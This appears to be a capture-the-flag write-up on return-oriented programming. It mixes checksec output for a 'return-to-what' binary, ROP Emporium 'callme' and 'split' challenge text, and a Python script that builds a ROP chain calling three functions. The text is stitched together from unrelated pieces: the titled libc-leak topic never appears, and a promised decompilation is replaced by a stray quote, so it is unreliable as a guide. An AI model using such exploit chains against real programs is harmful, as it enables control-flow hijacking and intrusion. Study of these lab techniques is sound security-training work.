Leaking Libc addresses to do ret2libc with unknown libc
First let's take a look at the binary mitigations.
$ checksec return-to-what
[*] '/home/h4x5p4c3/Downloads/ret2what/return-to-what'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

NX is enabled, so we can't simply overflow the buffer and return into shellcode placed on the stack. There is no stack canary, which makes the overflow itself straightforward, and No PIE means the binary's own code, PLT and GOT sit at fixed addresses starting at 0x400000. ASLR is probably enabled on the target, so libc will be loaded at a different base on every run; that is why we have to leak a libc address first and compute the base from it.
Decompilation and Disassembly
The decompilation of the assembly code looks like this:
“Failure is not an option”
Important note > To dispose of the need for any RE I’ll tell you the following You must call the callme_one(), callme_two() and callme_three() functions in that order, each with the arguments 0xdeadbeef, 0xcafebabe, 0xd00df00d e.g. callme_one(0xdeadbeef, 0xcafebabe, 0xd00df00d) to print the flag. For the x86_64 binary double up those values, e.g. callme_one(0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)
The challenge files can be found here ~> callme
Challenge description > In this challenge the elements that allowed you to complete the ret2win challenge are still present, they’ve just been split apart. Find them and recombine them using a short ROP chain.
The binary can be found here ~> split
This challenge is slightly different from the previous one. As the description says, all the elements are still present, they have just been split apart, so we'll recombine them now :)
What is return oriented programming?
Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection and code signing.
In this technique, an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine’s memory, called “gadgets”. Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code.
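To make the gadget idea concrete for the callme note above (three functions, each called with the same three doubled-up arguments, in order), here is a small chain builder. This is an added example written for this page, not the author's exploit script and not ROP Emporium's code. The buffer offset, the `pop rdi; pop rsi; pop rdx; ret` gadget address and the three PLT addresses are assumed placeholder values, not the challenge binary's real ones; on a real target you read them from the binary with objdump and a gadget finder such as ROPgadget or ropper.

```python
import struct

# All addresses below are placeholders for illustration (assumed, not taken
# from the actual challenge binary). On a real target read them from the
# binary: PLT entries via `objdump -d`, gadgets via ROPgadget/ropper.
OFFSET_TO_RET = 40                # bytes from buffer start to saved RIP (assumed)
POP_RDI_RSI_RDX_RET = 0x40093c    # assumed: pop rdi; pop rsi; pop rdx; ret
CALLME_ONE = 0x400720             # assumed callme_one@plt
CALLME_TWO = 0x400740             # assumed callme_two@plt
CALLME_THREE = 0x4006f0           # assumed callme_three@plt

# Arguments the challenge demands, "doubled up" for the 64-bit binary.
ARGS = (0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)


def p64(value):
    """Pack a 64-bit little-endian qword, the unit every stack slot holds."""
    return struct.pack("<Q", value)


def rop_call(gadget, func, args):
    """Emulate `func(rdi, rsi, rdx)` with a ROP chain.

    The x86_64 SysV ABI passes the first three integer arguments in
    rdi, rsi and rdx.  `ret` pops the gadget address into rip; the gadget
    pops the three following qwords into those registers, and its own
    `ret` pops the next qword, the function address, into rip.
    """
    if len(args) != 3:
        raise ValueError("this gadget loads exactly three registers")
    return p64(gadget) + b"".join(p64(a) for a in args) + p64(func)


def build_callme_chain(offset=OFFSET_TO_RET):
    """Padding up to the saved return address, then three chained calls.

    When callme_one returns it executes `ret`, which pops the next slot
    (our second gadget), so control never leaves the chain.
    """
    payload = b"A" * offset
    for func in (CALLME_ONE, CALLME_TWO, CALLME_THREE):
        payload += rop_call(POP_RDI_RSI_RDX_RET, func, ARGS)
    return payload


def chain_slots(payload, offset=OFFSET_TO_RET):
    """Decode the qwords after the padding so the chain can be inspected."""
    chain = payload[offset:]
    if len(chain) % 8:
        raise ValueError("chain is not qword-aligned")
    return [struct.unpack("<Q", chain[i:i + 8])[0]
            for i in range(0, len(chain), 8)]


if __name__ == "__main__":
    payload = build_callme_chain()
    for i, slot in enumerate(chain_slots(payload)):
        print(f"rsp+{i * 8:#05x}: {slot:#018x}")
    # Write it out and feed it to the binary, e.g. ./callme < payload.bin
    with open("payload.bin", "wb") as f:
        f.write(payload)
```

The same shape (padding, then gadget, then the values the gadget pops, then the function to return into) is what the split challenge needs too, only with a single `pop rdi; ret` gadget, the address of the command string, and `system@plt`. If a call crashes inside libc on an SSE instruction such as `movaps`, the stack is misaligned at the call; inserting one extra `ret` gadget before the function address shifts rsp by 8 and fixes it.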